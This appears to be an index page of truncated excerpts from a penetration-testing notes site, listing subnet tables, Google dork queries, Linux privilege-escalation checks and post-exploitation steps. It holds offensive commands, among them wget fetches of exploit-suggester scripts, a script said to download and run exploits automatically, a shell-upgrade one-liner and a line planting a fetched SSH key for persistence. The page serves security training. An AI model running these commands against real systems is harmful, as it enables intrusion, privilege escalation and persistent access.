Latest notes for PenTesting - MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Port Scanning
Subnet Reference Table
/ Addresses Hosts Netmask Amount of a Class C
/30 4 2 255.255.255.252 1/64
/29 8 6 255.255.255.248 1/32
/28 16 14 255.255.255.240 1/16
/27 32 30 255.255.255.224 1/8
/26 64 62 255.255.255.192 1/4
/25 128 126 255.255.255.128 1/2
/24 256 254 255.255.255.0 1
/23 512 51...


Google Hacking

Google search to find website sub domains
site:microsoft.com

Google filetype, and intitle
intitle:"netbotz appliance" "OK" -filetype:pdf

Google inurl
inurl:"level/15/sexec/-/show"

Google Hacking Database:
https://www.exploit-...


Set the Target IP Address to the $ip system variable
export ip=192.168.1.100

Find the location of a file
locate sbd.exe

Search through directories in the $PATH environment variable
which sbd

Find a file whose name contains a specific string:
find / -name sbd\*

Show active int...


Scripts to run

The following script runs exploit suggester and automatically downloads and executes suggested exploits:
https://raw.githubusercontent.com/codingo/OSCP-1/master/xploitdeli.py
wget http://www.securitysift.com/download/linuxprivchecker.py
wget https://github.com/pentestmonkey/unix-privesc-check

Other scripts:
wget https://raw...


Linux elevation of privileges, manual testing
Things to look for: misconfigured services (cronjobs), incorrect file permissions (exportfs, sudo), a misconfigured environment ($PATH), binaries with the SUID bit set, and software or an OS with known vulnerabilities.

First try simple sudo:
$ sudo su -

What can we run with sudo?
$ sudo -l

Try su as all users ...


Post exploitation
Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH, TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash

Add public key to authorized keys:
$ echo $(wget https://A...


Why is it called the Dirty COW bug?
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the ...